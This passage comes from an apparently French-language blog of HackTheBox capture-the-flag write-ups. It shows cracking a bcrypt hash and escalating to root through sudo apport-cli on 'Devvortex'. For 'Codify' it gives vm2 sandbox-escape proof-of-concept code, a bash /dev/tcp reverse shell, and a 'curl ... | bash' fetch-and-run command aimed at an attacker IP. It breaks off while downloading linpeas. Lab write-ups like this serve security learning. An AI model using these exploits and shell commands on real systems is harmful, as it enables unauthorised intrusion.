class="cl">$ hashcat -m <span class="m">3200</span> -a <span class="m">0</span> -d <span class="m">1</span> hash.txt /home/leopold/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl"><span class="nv">$2</span>y<span class="nv">$10$IT4k5kmSGvHSO9d6M</span>/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh-to-logan">SSH to logan </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ssh logan@localhost </span></span><span class="line"><span class="cl">Password: tequieromucho </span></span><span class="line"><span class="cl">logan@devvortex:~$ cat users.txt </span></span><span class="line"><span class="cl">FLAG................ </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="enumeration-1">Enumeration </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">logan@devvortex:~$ sudo -l </span></span><span class="line"><span class="cl"><span class="o">[</span>sudo<span class="o">]</span> password <span class="k">for</span> logan: </span></span><span class="line"><span class="cl">Sorry, try again. </span></span><span class="line"><span class="cl"><span class="o">[</span>sudo<span class="o">]</span> password <span class="k">for</span> logan: </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> logan on devvortex: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, </span></span><span class="line"><span class="cl"> <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User logan may run the following commands on devvortex: </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL : ALL<span class="o">)</span> /usr/bin/apport-cli </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploit--apport-cli-as-root">Exploit : apport-cli as root </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">logan@devvortex:~$ sudo /usr/bin/apport-cli --file-bug </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*** What kind of problem <span class="k">do</span> you want to report? </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Choices: </span></span><span class="line"><span class="cl"> 1: Display <span class="o">(</span>X.org<span class="o">)</span> </span></span><span class="line"><span class="cl"> 2: External or internal storage devices <span class="o">(</span>e. g. USB sticks<span class="o">)</span> </span></span><span class="line"><span class="cl"> 3: Security related problems </span></span><span class="line"><span class="cl"> 4: Sound/audio related problems </span></span><span class="line"><span class="cl"> 5: dist-upgrade </span></span><span class="line"><span class="cl"> 6: installation </span></span><span class="line"><span class="cl"> 7: installer </span></span><span class="line"><span class="cl"> 8: release-upgrade </span></span><span class="line"><span class="cl"> 9: ubuntu-release-upgrader </span></span><span class="line"><span class="cl"> 10: Other problem </span></span><span class="line"><span class="cl"> C: Cancel </span></span><span class="line"><span class="cl">Please choose <span class="o">(</span>1/2/3/4/5/6/7/8/9/10/C<span class="o">)</span>: <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*** Collecting problem information </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The collected information can be sent to the developers to improve the </span></span><span class="line"><span class="cl">application. This might take a few minutes. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*** What display problem <span class="k">do</span> you observe? </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Choices: </span></span><span class="line"><span class="cl"> 1: I don<span class="err">&#39;</span>t know </span></span><span class="line"><span class="cl"> 2: Freezes or hangs during boot or usage </span></span><span class="line"><span class="cl"> 3: Crashes or restarts back to login screen </span></span><span class="line"><span class="cl"> 4: Resolution is incorrect </span></span><span class="line"><span class="cl"> 5: Shows screen corruption </span></span><span class="line"><span class="cl"> 6: Performance is worse than expected </span></span><span class="line"><span class="cl"> 7: Fonts are the wrong size </span></span><span class="line"><span class="cl"> 8: Other display-related problem </span></span><span class="line"><span class="cl"> C: Cancel </span></span><span class="line"><span class="cl">Please choose <span class="o">(</span>1/2/3/4/5/6/7/8/C<span class="o">)</span>: <span class="m">2</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*** </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">To debug X freezes, please see https://wiki.ubuntu.com/X/Troubleshooting/Freeze </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Press any key to <span class="k">continue</span>... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">..dpkg-query: no packages found matching xorg </span></span><span class="line"><span class="cl">........... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*** Send problem report to the developers? </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">After the problem report has been sent, please fill out the form in the </span></span><span class="line"><span class="cl">automatically opened web browser. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">What would you like to <span class="k">do</span>? Your options are: </span></span><span class="line"><span class="cl"> S: Send report <span class="o">(</span>1.4 KB<span class="o">)</span> </span></span><span class="line"><span class="cl"> V: View report </span></span><span class="line"><span class="cl"> K: Keep report file <span class="k">for</span> sending later or copying to somewhere <span class="k">else</span> </span></span><span class="line"><span class="cl"> I: Cancel and ignore future crashes of this program version </span></span><span class="line"><span class="cl"> C: Cancel </span></span><span class="line"><span class="cl">Please choose <span class="o">(</span>S/V/K/I/C<span class="o">)</span>: V </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">!/bin/bash </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">root@devvortex:/home/logan# </span></span><span class="line"><span class="cl">root@devvortex:/home/logan# <span class="nb">cd</span> </span></span><span class="line"><span class="cl">root@devvortex:~# cat root.txt </span></span><span class="line"><span class="cl">8b49.....2438 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/codify-htb/Wed, 10 Jan 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/codify-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Codify cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Codify</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.239</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2023-12-31 01:27 CET </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.11.239 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.016s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Not shown: <span class="m">65532</span> closed ports </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl">80/tcp open http Apache httpd 2.4.52 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.52 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://codify.htb/ </span></span><span class="line"><span class="cl">3000/tcp open http Node.js Express framework </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Codify </span></span><span class="line"><span class="cl">Service Info: Host: codify.htb<span class="p">;</span> OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl">Nmap <span class="k">done</span>: <span class="m">1</span> IP address <span class="o">(</span><span class="m">1</span> host up<span class="o">)</span> scanned in 20.10 seconds </span></span></code></pre></td></tr></table> </div> </div><h3 id="etchosts">/etc/hosts </h3><p>On ajoute les noms de domaines necessaire.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## ...</span> </span></span><span class="line"><span class="cl">10.10.11.239 </span></span></code></pre></td></tr></table> </div> </div><h3 id="dirb-gobuster-dirsearch">dirb, gobuster, dirsearch </h3><p>L&rsquo;endpoint editor semble permettre d&rsquo;executer du javscript et d&rsquo;afficher le resultat.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/github/dirsearch<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ dirbuster </span></span><span class="line"><span class="cl">Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings<span class="o">=</span>on -Dswing.aatext<span class="o">=</span><span class="nb">true</span> </span></span><span class="line"><span class="cl">Starting OWASP DirBuster 1.0-RC1 </span></span><span class="line"><span class="cl">Starting dir/file list based brute forcing </span></span><span class="line"><span class="cl">Dir found: / - <span class="m">200</span> </span></span><span class="line"><span class="cl">File found: /about - <span class="m">200</span> </span></span><span class="line"><span class="cl">File found: /editor - <span class="m">200</span> </span></span><span class="line"><span class="cl">File found: /limitations - <span class="m">200</span> </span></span><span class="line"><span class="cl">Dir found: /about/ - <span class="m">200</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="editor--node-js-sandbox">Editor : node js sandbox </h3><p>Il y a un &ldquo;editor&rdquo;. C&rsquo;est une sandbox node js, qui permet donc a n&rsquo;importe qui d&rsquo;executer du code node js depuis navigateur en accédant a leur site internet et d&rsquo;obtenir le resultat a l&rsquo;écran. Ils interdisent bien sûr les modules tels que <strong>child_process</strong> qui permettent d&rsquo;executer du code arbitraire sur la machine.</p> <p>Cependant, sur la page <strong>/about</strong> il est précise que l&rsquo;éditeur de code fonctionne grâce à la <strong>vm2 library 3.9.16</strong> accompagné d&rsquo;un lien github. En tapant sur internet, on trouve tout de suite une vulnérabilité qui permet d&rsquo;important quand meme <strong>child_process</strong> et donc de pouvoir executer du code arbitraire.</p> <p>Voici un PoC(Proof of concept):</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">const <span class="o">{</span>VM<span class="o">}</span> <span class="o">=</span> require<span class="o">(</span><span class="s2">&#34;vm2&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">const <span class="nv">vm</span> <span class="o">=</span> new VM<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">const <span class="nv">code</span> <span class="o">=</span> <span class="sb">`</span> </span></span><span class="line"><span class="cl"><span class="nv">aVM2_INTERNAL_TMPNAME</span> <span class="o">=</span> <span class="o">{}</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="k">function</span> stack<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> new Error<span class="o">()</span>.stack<span class="p">;</span> </span></span><span class="line"><span class="cl"> stack<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">try <span class="o">{</span> </span></span><span class="line"><span class="cl"> stack<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> catch <span class="o">(</span>a<span class="nv">$tmpname</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> a<span class="nv">$tmpname</span>.constructor.constructor<span class="o">(</span><span class="s1">&#39;return process&#39;</span><span class="o">)()</span>.mainModule.require<span class="o">(</span><span class="s1">&#39;child_process&#39;</span><span class="o">)</span>.execSync<span class="o">(</span><span class="s1">&#39;whoami&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="sb">`</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">console.log<span class="o">(</span>vm.run<span class="o">(</span>code<span class="o">))</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p>PoC 2:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">const <span class="o">{</span>VM<span class="o">}</span> <span class="o">=</span> require<span class="o">(</span><span class="s2">&#34;vm2&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">const <span class="nv">vm</span> <span class="o">=</span> new VM<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">const <span class="nv">code</span> <span class="o">=</span> <span class="sb">`</span> </span></span><span class="line"><span class="cl"><span class="nv">err</span> <span class="o">=</span> <span class="o">{}</span><span class="p">;</span> </span></span><span class="line"><span class="cl">const <span class="nv">handler</span> <span class="o">=</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> getPrototypeOf<span class="o">(</span>target<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="o">(</span><span class="k">function</span> stack<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> new Error<span class="o">()</span>.stack<span class="p">;</span> </span></span><span class="line"><span class="cl"> stack<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">})()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">const <span class="nv">proxiedErr</span> <span class="o">=</span> new Proxy<span class="o">(</span>err, handler<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">try <span class="o">{</span> </span></span><span class="line"><span class="cl"> throw proxiedErr<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> catch <span class="o">({</span>constructor: c<span class="o">})</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> c.constructor<span class="o">(</span><span class="s1">&#39;return process&#39;</span><span class="o">)()</span>.mainModule.require<span class="o">(</span><span class="s1">&#39;child_process&#39;</span><span class="o">)</span>.execSync<span class="o">(</span><span class="s1">&#39;touch pwned&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="sb">`</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">console.log<span class="o">(</span>vm.run<span class="o">(</span>code<span class="o">))</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Ce code permet donc d&rsquo;executer la commande <strong>whoami</strong> et d&rsquo;afficher le resultat. On observer d&rsquo;ailleurs que l&rsquo;utilisateur qui execute les commandes node js est <strong>svc</strong></p> <p><img src="https://leopoldabgn.github.io/writeups/p/codify-htb/image.png" width="428" height="439" srcset="https://leopoldabgn.github.io/writeups/p/codify-htb/image_hu_a95d9a3af76a8bd5.png 480w, https://leopoldabgn.github.io/writeups/p/codify-htb/image_hu_e676564dea9a83d1.png 1024w" loading="lazy" alt="PoC whoami" class="gallery-image" data-flex-grow="97" data-flex-basis="233px" ></p> <h3 id="exploit--vm2-library-3916">Exploit : vm2 library 3.9.16 </h3><p>Voici un code pour créer un reverse shell sur la target. Il est stocké dans un fichier <code>index.html</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">##!/bin/bash</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">bash -i &gt;<span class="p">&amp;</span> /dev/tcp/10.10.14.125/44445 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span></code></pre></td></tr></table> </div> </div><p>On ouvre un server http sur le port 80. Cela va permettre d&rsquo;effectuer un <code>curl</code> depuis la target pour récupérer le code de <code>index.html</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">~/github/Hacking/HackTheBox/Machines/Codify <span class="o">(</span>main*<span class="o">)</span> » sudo python3 -m http.server <span class="m">80</span> <span class="m">1</span> ↵ </span></span><span class="line"><span class="cl">Serving HTTP on 0.0.0.0 port <span class="m">80</span> <span class="o">(</span>http://0.0.0.0:80/<span class="o">)</span> ... </span></span><span class="line"><span class="cl">10.10.11.239 - - <span class="o">[</span>31/Dec/2023 15:33:13<span class="o">]</span> <span class="s2">&#34;GET / HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span></code></pre></td></tr></table> </div> </div><p>Voici le code pour récupérer le code du reverse shell et l&rsquo;executer : <strong>curl 10.10.14.125:80 | bash</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">const <span class="o">{</span>VM<span class="o">}</span> <span class="o">=</span> require<span class="o">(</span><span class="s2">&#34;vm2&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">const <span class="nv">vm</span> <span class="o">=</span> new VM<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">const <span class="nv">code</span> <span class="o">=</span> <span class="sb">`</span> </span></span><span class="line"><span class="cl"><span class="nv">err</span> <span class="o">=</span> <span class="o">{}</span><span class="p">;</span> </span></span><span class="line"><span class="cl">const <span class="nv">handler</span> <span class="o">=</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> getPrototypeOf<span class="o">(</span>target<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="o">(</span><span class="k">function</span> stack<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> new Error<span class="o">()</span>.stack<span class="p">;</span> </span></span><span class="line"><span class="cl"> stack<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">})()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">const <span class="nv">proxiedErr</span> <span class="o">=</span> new Proxy<span class="o">(</span>err, handler<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">try <span class="o">{</span> </span></span><span class="line"><span class="cl"> throw proxiedErr<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> catch <span class="o">({</span>constructor: c<span class="o">})</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> c.constructor<span class="o">(</span><span class="s1">&#39;return process&#39;</span><span class="o">)()</span>.mainModule.require<span class="o">(</span><span class="s1">&#39;child_process&#39;</span><span class="o">)</span>.execSync<span class="o">(</span><span class="s1">&#39;curl 10.10.14.125:80 | bash&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="sb">`</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">console.log<span class="o">(</span>vm.run<span class="o">(</span>code<span class="o">))</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="https://leopoldabgn.github.io/writeups/p/codify-htb/image-1.png" width="862" height="281" srcset="https://leopoldabgn.github.io/writeups/p/codify-htb/image-1_hu_3b3a05bc16986be2.png 480w, https://leopoldabgn.github.io/writeups/p/codify-htb/image-1_hu_6dacf16ee7f09de4.png 1024w" loading="lazy" alt="Alt text" class="gallery-image" data-flex-grow="306" data-flex-basis="736px" ></p> <p>On est bien connecté !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">~ » nc -lvp <span class="m">44445</span> </span></span><span class="line"><span class="cl">Listening on 0.0.0.0 <span class="m">44445</span> </span></span><span class="line"><span class="cl">Connection received on codify.htb <span class="m">60340</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>1254<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">svc@codify:~$ ls </span></span><span class="line"><span class="cl">ls </span></span><span class="line"><span class="cl">pwned </span></span></code></pre></td></tr></table> </div> </div><h3 id="stable-shell">Stable shell </h3><p>On ouvre un shell plus stable en python</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">svc@codify:~$ python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">svc@codify:~$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">svc@codify:~$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">23986</span> suspended nc -lvp <span class="m">44445</span> </span></span><span class="line"><span class="cl">~ » stty raw -echo<span class="p">;</span> <span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">23986</span> continued nc -lvp <span class="m">44445</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">svc@codify:~$ </span></span></code></pre></td></tr></table> </div> </div><h3 id="joshua">joshua </h3><p>En regardant dans /home, on trouve l&rsquo;utilisateur <strong>joshua</strong>. On va essayer de trouver son mot de passe pour avoir un accès à un compte utilisateur sur la machine cible.</p> <h3 id="joshua-password--ticketsdb">joshua password : tickets.db </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">svc@codify:~$ curl 10.10.14.125:80/linpeas.sh &gt; 